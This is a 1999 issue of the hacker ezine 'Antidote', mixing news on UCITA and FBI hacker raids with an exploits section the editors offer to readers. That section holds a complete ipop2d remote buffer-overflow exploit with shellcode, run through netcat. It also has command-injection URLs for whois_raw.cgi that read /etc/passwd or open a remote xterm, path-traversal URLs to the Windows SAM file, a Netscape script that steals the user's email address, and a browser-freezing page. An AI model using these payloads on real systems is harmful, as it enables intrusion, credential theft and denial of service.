Copy Link
Add to Bookmark
Report
Antidote Vol. 02 Issue 07
Volume 2 Issue 7
6/4/99
** **
***** * * ** *
* *** ** *** ** **
*** ** * ** **
* ** ******** ** **** ********
* ** *** **** ******** *** *** ** * *** * ******** ***
* ** **** **** * ** *** ********* * **** ** * ***
* ** ** **** ** ** ** **** ** ** ** * ***
* ** ** ** ** ** ** ** ** ** ** ** ***
********* ** ** ** ** ** ** ** ** ** ********
* ** ** ** ** ** ** ** ** ** ** *******
* ** ** ** ** ** ** ** ** ** ** **
***** ** ** ** ** ** ** ** ****** ** **** *
* **** ** * *** *** ** *** * ***** **** ** *******
* ** ** *** *** *** *** *****
*
** http://www.thepoison.org/antidote
bof_ptr = (long *)buffer;
for (i = 0; i < bufsize - 4; i += 4)
*(bof_ptr++) = get_sp() - offs;
printf ("Creating termcap f1le\n");
printf ("b1tch is Fe3lin 1t.\n";
------------------------------
In this issue of Antidote, we have over 620 subscribers and getting more everyday! The
only thing that we ask of you when you read Antidote, is that you go to:
www.thepoison.org/popup.html
and click on our sponsors. One issue of Antidote takes us about a week to put together
and going to our sponsor only takes you about 15 seconds (if that). So please go visit
our sponsor because it is the only thing we ask of you.
--=\\Contents\\=--
0.00 - Beginning
0.01 - What?
0.02 - FAQ
0.03 - Shouts
0.04 - Writing
1.00 - News
1.01 - UCITA almost Approved
1.02 - FBI missing the Real Hacking Threat?
1.03 - Microsoft Employee Raided
2.00 - Exploits (new & older)
2.01 - nt.ras_rras.password.txt
2.02 - NetIQ.txt
2.03 - compaq_insight.server.txt
2.04 - pc_anywhere.dos.txt
2.05 - ie.color.htm.txt
2.06 - sdi_pop2.c.txt
2.07 - netscape.view_source.htm.txt
2.08 - whois_raw.cgi.txt
3.00 - Misc
3.01 - ZKS Freedom AIP
------------------------------
<!-- 0.00 - Beginning //-->
0.01 --=\\What?\\=--
What is 'Antidote'? Well, we wouldn't say that Antidote is a hacking magazine, cause
that would be wrong. We don't claim to be a hacking magazine. All Antidote is, is
basically current news and happenings in the underground world. We aren't going to teach
you how to hack or anything, but we will supply you with the current information and
exploits. Mainly Antidote is just a magazine for people to read if they have some extra
time on there hands and are bored with nothing to do. If you want to read a magazine
that teaches you how to hack etc, then you might want to go to your local bookstore and
see if they carry '2600'.
------------------------------
0.02 --=\\FAQ\\=--
Here are a lot of questions that we seem to recieve a lot, or our "Frequently Asked
Questions". Please read this before e-mailing us with questions and if the question
isn't on here or doesn't make sense, then you can e-mail us with your question.
> What exactly is "Antidote"?
See section 0.01 for a complete description.
> I find Antidote to not be shot for the beginner or does not teach you the basics,
why is that?
Antidote is for everyone, all we are basically is a news ezine that comes out once
a week with the current news, exploits, flaws and even programming. All of the
articles that are in here are recieved second hand (sent to us) and we very rarely
edit anyone's articles.
> I just found Antidote issues on your webpage, is there anyway I can get them sent
to me through e-mail?
Yes, if you go to www.thepoison.org/antidote there should be a text box where you can
input your e-mail address. You will recieve a link to the current Antidote (where you
can view it).
> If I want to submit something, are there any 'rules'?
Please see section 0.03 for a complete description.
> If I submitted something, can I remain anonymous?
Yes. Just make sure that you specify what information about yourself you would like to
be published above your article (when sending it to us) and we will do what you say.
> I submitted something and I didn't see it in the current/last issue, why is that?
It could be that someone else wrote something similar to what you wrote and they sent
it to us first. If you sent us something and we didn't e-mail you back, then you might
want to send it again because we probably didn't get it (we respond to all e-mails no
matter what). We might use your article in future issues off Antidote.
> Can I submit something that I didn't "discover" or "write"?
Yes you can, we take information that is written by anyone regardless if you wrote it
or not.
Well thats it for our FAQ. If you have a question that is not on here or the question is
on here and you had trouble understanding it, then please feel free to e-mail
lordoak@thepoison.org and he will answer your question. This FAQ will probably be
updated every month.
------------------------------
0.03 --=\\Shouts\\=--
These are just some shout outs that we feel we owe to some people. Some are individuals
and Some are groups in general. If you are not on this list and you feel that For some
reason you should be, then please contact Lord Oak and he will post you on here and we
are sorry for the Misunderstanding. Well, here are the shout outs:
Lord Oak EazyMoney
Duece opt1mus
PBBSER oX1dation
Forlorn Retribution
0dnek www.thepoison.org
Like we said above, if we forgot you and/or you think you should be added, please e-mail
lordoak@thepoison.org and he will be sure to add you.
------------------------------
0.04 --=\\Writing\\=--
As many of you know, we are always open to articles/submittings. We will take almost
anything that has to do with computer security. This leaves you open for:
-Protecting the system (security/securing)
-Attacking the system (hacking, exploits, flaws, etc....)
-UNIX (really anything to do with it...)
-News that has to do with any of the above....
The only thing that we really don't take is webpage hacks, like e-mailing us and saying
"www.xxx.com" was hacked... But if you have an opinion about the hacks that is fine. If
you have any questions about what is "acceptable" and not, please feel free to e-mail
Lord Oak [lordoak@thepoison.org] with your question and he will answer it. Also, please
note that if we recieve two e-mails with the same topic/idea then we will use the one
that we recieved first. So it might be a good idea to e-mail one of us and ask us if
someone has written about/on this topic so that way you don't waste your time on writing
something that won't be published. An example of this would be:
If Joe sends me an e-mail with the topic being on hacking hotmail accounts on
thursday.
And then Bill sends us an e-mail on hacking hotmail accounts on sunday, we will
take Joe's article because he sent it in first.
But keep in mind, we might use your article for the next issue! If you have something
that you would like to submit to Antidote, please e-mail lordoak@thepoison.org or
duece@thepoison.org and one of us will review the article and put it in Antidote (if we
like it).
------------------------------
_________________________________
) ___ (
( //___/ / // ) ) // ) ) )
) /____ / // / / __ / / (
( / / // / / ) ) )
) / / ((___/ / ((___/ / (
( http://www.403-security.org )
) For the latest hacks and news (
(___________________________________)
<!-- 1.00 - News //-->
1.01 --=\\UCITA almost Approved\\=--
[www.infoworld.com]
Imagine the horror of walking into work one day to find your software vendor holding
your company hostage by threatening to shut down your mission-critical systems unless
you concede to its terms.
Sounds illegal, right? Perhaps not.
Although many IT professionals are unaware of it, that practice will become legally
defensible if new legislation called the Uniform Computer Information Transactions Act,
or UCITA, is approved.
UCITA is a proposed law for applying consistent rules to computer software licenses
across all 50 states. It would
* give vendors the right to repossess software by disabling it remotely;
* make the terms of shrink-wrapped licenses more enforceable;
* prevent the transfer of licenses from one party to another without vendor
permission;
* allow vendors to disclaim warrantees;
* outlaw reverse engineering.
Proponents of the law, primarily software vendors, say it is time for a uniform law that
applies directly to software licenses. Critics, including technology consumer groups
such as the Society of Information Managers (SIM), say UCITA is fatally flawed and
should be killed. Other trade organizations representing the motion picture industry,
newspapers, magazines, and the music recording industry, have joined SIM in opposing
UCITA.
In July, a state attorney organization known as the National Conference of Commissioners
on Uniform State Laws (NCCUSL) will meet in Denver to approve UCITA. If the organiza-
tion gives the proposal a green light, a few state legislatures are likely to rubber-
stamp it by the end of the year and UCITA will become law, according to UCITA experts.
This fast time table has opponents up in arms. Although SIM is in favor of a law to
govern software licensing, it says it believes UCITA cannot be fixed.
"This law would significantly increase the level of the burden on the IT procurement
function and significantly increase the cost of procurement -- both in staff costs and
out-of-pocket costs," says Susan Nycum, a SIM member and an attorney at law firm Baker &
McKenzie, in Palo Alto, Calif.
Although many software vendor representatives attended development meetings to discuss
the law and lobbied its creators, most attendees contacted by InfoWorld refused to
discuss their views on the record.
And although this law threatens to profoundly affect how IT departments in both large
and small companies do business, most IT professionals remain unaware of the law and its
ramifications.
"We were naive about how things were handled," says Randy Roth, a SIM member who also
works at the Principal Financial Group, in Des Moines, Iowa. "We thought, gee, when
people are writing these laws they are making sure they are balanced and somebody is
watching out for our best interests."
http://www.infoworld.com/cgi-bin/displayStory.pl?/features/990531ucita.htm
------------------------------
1.02 --=\\FBI missing the Real Hacking Threat?\\=--
[www.zdnet.com]
With the FBI executing 16 search warrants in 12 cities, U.S. attorney Paul Coggins said
Wednesday the Federal Government's "massive" hunt for the hackers responsible for a
string of high-profile hacks of government sites was "the most far reaching hacking
investigation ever conducted by the Department of Justice."
Several security watchers, however, consider the manhunt a distraction, and say that the
biggest threats to online security are the hackers who aren't making headlines -- an
observation supported by Wednesday's hack of the Department of Energy's Brookhaven
National Laboratory.
In the Brookhaven hack, intruders claiming to be the Posse replaced the laboratory's
home page with a picture of TV personality Rosie O'Donnell and a treatise. According to
security watchers, the Posse is more sophisticated than the hackers behind previous
government site hacks.
The Posse's note prominently thanked the script kiddies, who use script-based programs
to break into servers, for grabbing the attention of the FBI. "While you have been keep-
ing the FBI (Federal Bureau Of Instigation) and SS (Secret Cervix) busy tracking down 14
year old hacker hopefuls; we have spent our time burrowing ourselves deep within
Corporate America," the Posse's note read at one point.
While the Brookhaven hack was quickly removed, MSNBC reported that the site itself was
taken offline between 5:30 a.m. and 1 p.m. PT.
'The biggest threats'
"The guys who broke into the White House site, it's like living in D.C., running over to
the White House and spray painting it," said B.K. DeLong, a security consultant in
Boston. "The biggest threats are the hackers that aren't making themselves known."
"There's a limit to what they (the script kiddies) could do," DeLong noted. "But if
these guys are getting in, what about the really experienced guys?"
An FBI official denied that FBI resources are being stretched thin by investigations
into comparatively minor hacking incidents.
"That's an erroneous statement," said FBI spokeswoman Debbie Weierman. "We take any type
of intrusion to a government computer very seriously." Agency officials "understand that
some individuals may simply want to make a statement" by putting up digital graffiti,
but by accessing government systems, "they are still committing a crime," she said.
While there had been speculation that the Department of Defense would pull its Web site
down to guard against hacking incidents, an agency spokesman said Wednesday there's no
plan for a wholesale shutdown of the site.
"Only certain pages are being taken down" to gauge their security, DoD spokesman Glenn
Flood said. Public information on the site will remain up during the testing, set to
begin later Wednesday and be concluded later this week, he said.
http://www.zdnet.com/zdnn/stories/news/0,4586,2269398,00.html
------------------------------
1.03 --=\\Microsoft Employee Raided\\=--
[www.msnbc.com]
JEFFREY ROBERSON, 19, was a self-described angry little kid two years ago, fairly well-
known as VallaH on the hacking scene, dabbling in writing hacker software tools. At his
worst, he says, he wrote software that crashed victims computers, forcing them to
reboot. Then a Microsoft employee saw his programming code, was duly impressed and
invited VallaH to Redmond, Wash. Over time, Roberson was convinced to put his skills to
good use and took the job. Hes spent the past year working on Windows 2000, testing for
interoperability with Unix systems his specialty.
But he also stayed involved in the hacker scene. He says he hadnt done anything illegal
since taking his job at Microsoft; in fact he says he spent his time trying to convince
other angry little kids that they could be creative instead of destructive. I talked to
them because I wanted to try to help them program. But someone passed his handle to the
FBI recently. Then his Seattle-area apartment was raided May 26 in the hacker sweep, and
VallaHs life instantly changed. His assignment at Microsoft was immediately terminated
hes now pleading his case with the company, hoping to get a new assignment.
http://www.msnbc.com/news/275876.asp
------------------------------
10001010100101110101010101001011101010101000
0 1
1 Y88b Y88 888 888 888 88e e88'Y88 0
1 Y88b Y8 888 888 888 888b d888 'Y 1
0 b Y88b Y 8888888 888 8888D C8888 1
0 8b Y88b 888 888 888 888P Y888 ,d 1
1 88b Y88b 888 888 888 88" "88,d88 0
1 1
1 http://www.nudehackers.com 0
0 0
01001010110101010001011010010111010100101011
<!-- 2.00 - Exploits //-->
2.01 --=\\nt.ras_rras.password.txt\\=--
On March 20th, Dieter Goepferich [dieter.goepferich@bigfoot.com]
discovered a vulnerability involving both RAS and RRAS. This was
subsequently reported in Heise Online, a German publication;
http://www.heise.de/newsticker/data/cp-12.04.99-000/
http://www.heise.de/newsticker/data/hos-15.04.99-000/
Dieter originally reported it via some "product improvement suggestion"
web form on www.microsoft.de back in March. Together we informed
Microsoft Security (secure@microsoft.com) back in April.
By default the registry key is only accessible to Administrator and the
user/owner of the passwords, but it represents a potential threat and a
location of password information which would not otherwise be expected.
See;
http://www.microsoft.com/security/bulletins/ms99-017.asp
for the complete write up including fix locations. There are two KB
articles about this (one for RAS, and another for RRAS). They were not
yet available at the time of writing.
RAS
http://support.microsoft.com/support/kb/articles/q230/6/81.asp
RRAS
http://support.microsoft.com/support/kb/articles/q233/3/03.asp
Russ
------------------------------
2.02 --=\\NetIQ.txt\\=--
AppManager is a product which enables an enterprise to monitor the performance and
availability of Windows NT server services such as Exchange, SQL, etc. It does this
via an agent on the target machine which reports back to a console. The agents monitor
for things like low disk space, misbehaving services, and so on. Like most products that
follow a manager/agent architecture, the agents must use an account with Administrator
privileges in order to do their job. The problem is that when the authentication occurs,
the userid and password are passed in clear text, meaning that anyone with a sniffer can
read it as it goes across the wire.
The other problem is that when someone with access to the AppManager console goes to look
at a job, all he or she must do is right-click on the job, select Properties, select the
View tab, and voila! The userid and password that the job is using is right there for all
to see. With version 3.0 they have replaced the password with asterisks, but the company
conceded that if someone were to copy the asterisks and paste them into a text file then the
password would be displayed instead of the asterisks! More security through obscurity.
The only fix so far is for an AppManager administrator to go into the Properties and
manually backspace over the password to remove it. Once this is done it will not appear
again on any of the consoles. However, if an "agent installation" job is run, the password
WILL be displayed in Properties, but only for the duration on the install, which is usually
between ten and fifteen minutes. There is currently no way to prevent this.
According to the company this is a "known issue." After some more discussion I found that
they have known about this for two years, yet apparently have not done anything to rectify
it. They said that encrypting the authentication sequence traffic is difficult to do
which is one of the reasons why they haven't fixed it yet. If their programmers can't
figure out in two years how to encrypt traffic then I think a another product should be
chosen.
------------------------------
2.03 --=\\compaq_insight.server.txt\\=--
Problem: The web server included in Compaq Insight
Manager could expose sensitive information.
Threat: Anyone that have access to port 2301 where
Compaq Insight Manager is installed could get
unrestricted access to the servers disk through
the "root dot dot" bug.
Platform: Detected on Windows NT and Novell Netware servers
running on Compaq hardware.
Solution: Disable the Compaq Insight Manager web server or
restrict anonymous access.
Vulnerability Description
-------------------------
When installing Compaq Insight Manager a web server gets installed. This web
server runs on port 2301 and is vulnerable to the old "root dot dot" bug. This
bug gives unrestricted access to the vulnerable server?s disk. It could easily
get exploited with one of the URLs:
http://vulnerable-NT.com:2301/../../../winnt/repair/sam._
http://vulnerable-Netware.com:2301/../../../system/ldremote.ncf
(How many dots there should be is install-dependent)
Solution
--------
You could probably fix the problem by restricting anonymous access to the Compaq
Insight Manager web server. If you are not using the web server, Infosec
recommends disabling the service.
Background
----------
Infosec gives the credits to Master Dogen who first reported the problem
(Windows NT and Compaq Insight Manager) to us and wanted us go public with a
vulnerability report.
Infosec have found that Novell Netware with Compaq Insight Manager have the same
problem but is not as common as on Windows NT.
Compaq Sweden was informed about this problem april 26, 1999.
Gabriel Sandberg, Infosec
gabriel.sandberg@infosec.se
------------------------------
2.04 --=\\pc_anywhere.dos.txt\\=--
Hello all,This is my first post to the group so I'll try to keep it as brief as
possible. Searching through the bugtraq archives, I came across articles
001732, 001734, 001737, and 001739 regarding PC Anywhere. So, I fired up my
telnet client, pointed it at port 5631 on a non-production host, and pasted
about 512kb of garbage (I copied & pasted a dll I opened in notepad) into it
when PC Anywhere responded with "Please press <Enter>". About 200k through
this dump, PC Anywhere hangs, utilizing 100% of the CPU, rendering the
target host useless but not crashing it. There's your DoS.
I ran this attack over TCP/IP against a couple of fully patched NT 4.0
Workstations (SP4), and a couple of fully patched NT 4.0 Servers (SP4), with
802up_a, 802up_b, and hostup_b applied to PC Anywhere, RAS was not installed
on any of the hosts. I got the same results on all machines.
I got in touch with Symantec development and found out that they do have a
fix for this problem, it's a patched aw32tcp.dll, it just hasn't made it to
their website yet. I have applied this fix to several machines (all with
the afore mentioned PC Anywhere patches applied) and it does indeed fix the
problem.
Hope this info will help. Thanks for your time.
Chris
------------------------------
2.05 --=\\ie.color.htm.txt\\=--
This is a new exploit which affects Microsoft Internet Explorer 5.0.
When you enter the html document below, IE will freeze and you have to
close it with ctrl + alt + del.
//THR
-----------Cut here------color.htm--------Start---------
<HTML>
<BODY>
<SCRIPT>
var color = new Array;
color[1] = "black";
color[2] = "white";
for(x = 0; x <3; x++)
{
document.bgColor = color[x]
if(x == 2)
{
x = 0;
}
}
</SCRIPT>
</BODY>
</HTML>
-----------Cut here------color.htm--------End---------
http://fly.to/unixhacking
------------------------------
2.06 --=\\sdi_pop2.c.txt\\=--
/*
* Sekure SDI (Brazilian Information Security Team)
* ipop2d remote exploit for linux (Jun, 02 1999)
*
* by c0nd0r <condor@sekure.org>
*
* (read the instructions below)
*
* Thanks to jamez, bahamas, dumped, bishop, slide, paranoia, stderr,
* falcon, vader, c_orb, marty(nordo!) and minha malinha!
* also to #uground (irc.brasnet.org) and #SDI (efnet),
* guys at el8.org, toxyn.org, pulhas.org
*
* Sincere Apologizes: duke (for the mistake we made with the wu-expl),
* your code rocks.
*
* Usage:
*
* SDI-pop2 <imap_server> <user> <pass> [offset]
*
* where imap_server = IMAP server at your box (or other place as well)
* user = any account at your box
* pass = the account's password
* offset = 0 is default -- increase if it's necessary.
*
* Example: (netcat rocks)
*
* (./SDI-pop ppp-666.lame.org rewt lame 0; cat) | nc lame.org 109
*
* ----------------------------------------------------------------
* HOWTO-exploit:
*
* In order to gain remote access as user nobody, you should set
* an IMAP server at your box (just edit the inetd.conf) or at
* any other machine which you have an account.
*
* During the anonymous_login() function, the ipop2d will set the
* uid to user nobody, so you are not going to get a rootshell.
* ----------------------------------------------------------------
*
*/
#include <stdio.h>
/*
* (shellcode)
*
* jmp 0x1f
* popl %esi
* movl %esi,0x8(%esi)
* xorl %eax,%eax
* movb %eax,0x7(%esi)
* movl %eax,0xc(%esi)
* movb $0xb,%al
* movl %esi,%ebx
* leal 0x8(%esi),%ecx
* leal 0xc(%esi),%edx
* int $0x80
* xorl %ebx,%ebx
* movl %ebx,%eax
* inc %eax
* int $0x80
* call -0x24
* .string \"/bin/sh\"
* grab your shellcode generator at www.sekure.org
*/
char c0d3[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
"\xff\xff/bin/sh";
main (int argc, char *argv[] ) {
char buf[2500];
int x,y=1000, offset=0;
long addr;
char host[255], user[255], pass[255];
int bsize=986;
if ( argc < 4) {
printf ( "Sekure SDI ipop2d remote exploit - Jun, 02 1999\n");
printf ( "usage:
(SDI-pop2 <imap server> <user> <pass> [offset];cat) | nc lame.org 109\n");
exit (0);
}
snprintf ( host, sizeof(host), "%s", argv[1]);
snprintf ( user, sizeof(user), "%s", argv[2]);
snprintf ( pass, sizeof(pass), "%s", argv[3]);
if ( argc > 4) offset = atoi ( argv[4]);
/* gimme the ret + offset */
addr = 0xbffff3c0 + offset;
fprintf ( stderr, "0wning data since 0x%x\n\n", addr);
/* calculation of the return address position */
bsize -= strlen ( host);
for ( x = 0; x < bsize-strlen(c0d3); x++)
buf[x] = 0x90;
for ( y = 0; y < strlen(c0d3); x++, y++)
buf[x] = c0d3[y];
for ( ; x < 1012; x+=4) {
buf[x ] = addr & 0x000000ff;
buf[x+1] = (addr & 0x0000ff00) >> 8;
buf[x+2] = (addr & 0x00ff0000) >> 16;
buf[x+3] = (addr & 0xff000000) >> 24;
}
sleep (1);
printf ( "HELO %s:%s %s\r\n", host, user, pass);
sleep (1);
printf ( "FOLD %s\r\n", buf);
}
------------------------------
2.07 --=\\netscape.view_source.htm.txt\\=--
There is a security vulnerability in Netscape Communicator 4.6 Win95,
4.07 Linux (probably all 4.x versions) in the way
it works with "view-source:wysiwyg://1/javascript" URLs. It parses them
in a "view-source" window.
The problem is that it allows access to documents included in the parent
document via
ILAYER SRC="view-source:wysiwyg://1/" using find(). That allows reading
the whole parsed document.
Vulnerabilites:
Browsing local directories
Reading user's cache
Reading parsed HTML files
Reading Netscape's configuration ("about:config") including user's
email address, mail servers and password.
Probably others
This vulnerability may be exploited by using HTML email message.
Workaround: Disable JavaScript
Netscape is notified about the problem.
Demonstration is available at: http://www.nat.bg/~joro/viewsource.html
Regards,
Georgi Guninski
http://www.nat.bg/~joro
http://www.whitehats.com/guninski
[ Part 2: "Attached Text" ]
[ The following text is in the "koi8-r" character set. ]
[ Your display is set for the "US-ASCII" character set. ]
[ Some characters may be displayed incorrectly. ]
There is a security vulnerability in Netscape Communicator 4.6 Win95, 4.07 Linux (probably all 4.x versions) in the way it
works with "view-source:wysiwyg://1/javascript" URLs. It parses them in a "view-source" window. The problem is that it
allows access to documents included in the parent document via ILAYER SRC="view-source:wysiwyg://1/" using find(). That
allows reading the whole parsed document.
Vulnerabilites:
_________________________________________________________________________________________________________________________________
Browsing local directories
Reading user's cache
Reading parsed HTML files
Reading Netscape's configuration ("about:config") including user's email address, mail servers and password.
Probably others
This vulnerability may be exploited by using HTML email message.
_________________________________________________________________________________________________________________________________
Workaround: Disable JavaScript
_________________________________________________________________________________________________________________________________
This demonstration tries to find your email address, it may take some time.
Written by Georgi Guninski
_________________________________________________________________________________________________________________________________
s="view-source:wysiwyg://1/javascript:s='vvvv>&>"" +"" +" blur();msg1=\"Your email is: \";
mend=\"general.\"+\"title_tips\";mag=\"mail.identity.useremail\"+\" = \";sp=\" \";res=mag;charstoread=50;" +"setTimeout(\"
" +"for(i=0;i'"; //a=window.open(s); location=s;
-----------------------------------------------------------------------------------------------------
<http://www.nat.bg/~joro/viewsource.html>
<HTML>
<BODY>
There is a security vulnerability in Netscape Communicator 4.6 Win95, 4.07 Linux (probably all 4.x versions) in the way
it works with "view-source:wysiwyg://1/javascript" URLs. It parses them in a "view-source" window.
The problem is that it allows access to documents included in the parent document via
ILAYER SRC="view-source:wysiwyg://1/" using find(). That allows reading the whole parsed document.
<BR>
Vulnerabilites:
<HR>
Browsing local directories<BR>
Reading user's cache<BR>
Reading parsed HTML files<BR>
Reading Netscape's configuration ("about:config") including user's email address, mail servers and password.<BR>
Probably others<BR>
<BR>
This vulnerability may be exploited by using HTML email message.
<HR>
Workaround: Disable JavaScript
<HR>
This demonstration tries to find your email address, it may take some time.
<BR><BR>
<A HREF="http://www.nat.bg/~joro">Written by Georgi Guninski</A>
<HR>
<SCRIPT>
s="view-source:wysiwyg://1/javascript:s='<TITLE>tttt</TITLE>vvvv>>"
+"<ILAYER SRC=\"view-source:wysiwyg://1/about:config\"></ILAYER>"
+" <SCRIPT>blur();msg1=\"Your email is: \"; mend=\"general.\"+\"title_tips\";mag=\"mail.identity.useremail\"+\" = \";sp=\" \";res=mag;charstoread=50;"
+"setTimeout(\" "
+"for(i=0;i<charstoread;i++) {"
+" t=res;"
+" find(mend);"
+" for(c=1;c<256;c++) {"
+" t=res + String.fromCharCode(c);"
+" if (find(t,true,true)) {"
+" res=t;"
+" if (c==32) i=charstoread+1"
+" } "
+" }"
+"}"
+"res=res.substring(mag.length);"
+"alert(msg1 + res);"
+" ;\",3000);</"+"SCRIPT>'";
//a=window.open(s);
location=s;
</SCRIPT>
------------------------------
2.08 --=\\whois_raw.cgi.txt\\=--
Hi,
sorry if this has already been known.
There is a problem in whois_raw.cgi, called from
whois.cgi. whois_raw.cgi is part of cdomain v1.0.
I don't know if new versions are vulnerable.
#!/usr/bin/perl
#
# whois_raw.cgi Written by J. Allen Hatch (zone@berkshire.net)
# 04/17/97
#
# This script is part of the cdomain v1.0 package which is available at:
# http://www.your-site.com/~zone/whois.html
...
require ("/usr/lib/perl5/cgi-lib.pl");
...
$fqdn = $in{'fqdn'};
# Fetch the root name and concatenate
# Fire off whois
if ($in{'root'} eq "it") {
@result=`$whois_cmd_it $fqdn`;
} elsif ($in{'fqdn'} eq "alicom.com" || $in{'fqdn'} eq "alicom.org") {
@result="Dettagli non disponibili per il dominio richiesto.";
} else {
@result=`$whois_cmd $fqdn`;
}
...
The exploit is banal and well known problem:
http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xterm%20-display%20graziella.lame.org:0
antirez
md5330@MCLINK.IT
------------------------------
<!-- 3.00 - Misc //-->
3.01 --=//ZKS Freedom AIP//=--
Although the ZKS Freedom AIP protocol (as described in version 1.0 of the
ZKS whitepaper) is conceptually similar to the PipeNet protocol, there are
several attacks against ZKS which PipeNet is not susceptible to. The
reason is that PipeNet uses end-to-end traffic padding, whereas ZKS only
uses link padding. I came up with several attacks against link padding
systems while developing PipeNet, which is why I ultimately choose
end-to-end padding. However one can argue that end-to-end padding is too
costly, and that these attacks are not practical because they require a
global observer or the cooperation of one or more of the anonymous router
(AIP) operators. ZKS has not publicly made this argument, but since they
are probably aware of these earlier attacks they must have followed its
reasoning.
I hope the practicality of the new attack presented here will change their
mind. In this attack, a user creates an anonymous route from himself
through a pair of AIPs back to himself. He then increases the traffic
through this route until total traffic between the pair of AIPs reach the
bandwidth limit set by the ZKS Traffic Shaper. At this point the AIPs no
longer send any padding packets to each other, and the real traffic
throughput between them can be deduced by subtracting the traffic sent by
the attacker from the bandwidth limit.
This attack implies that link padding buys virtually no security. An
attacker, without access to network sniffers or cooperation of any AIP
operator, can strip off link padding and obtain real-time throughput data
between all pairs of AIPs. If end-to-end padding is not used, this data
would correlate with traffic throughput of individual users, and
statistical analysis could then reveal their supposedly anonymous routes.
------------------------------
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
. Quote #1- .
. .
. "I got root on port 25 on your computer!" .
. -Carolyn Mienel .
. .
. Quote made up by Lord Oak. .
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
------------------------------
Please visit: www.thepoison.org/popup.html and click on our sponsors because we have to
pay the bills on thepoison.org somehow!
_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|
_| _|
_| _| _| _| _| _| _| _|
_| _| _| _|_| _| _|_| _| _|
_| _|_|_|_| _| _| _| _| _| _| _|
_| _| _| _| _|_| _| _|_| _|
_| _| _| _| _| _| _| _|
_| Antidote is an HNN Affiliate _|
_| http://www.hackernews.com _|
_| _|
_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|
All ASCII art in this issue is done by Lord Oak [lordoak@thepoison.prg] and permission
is needed before using.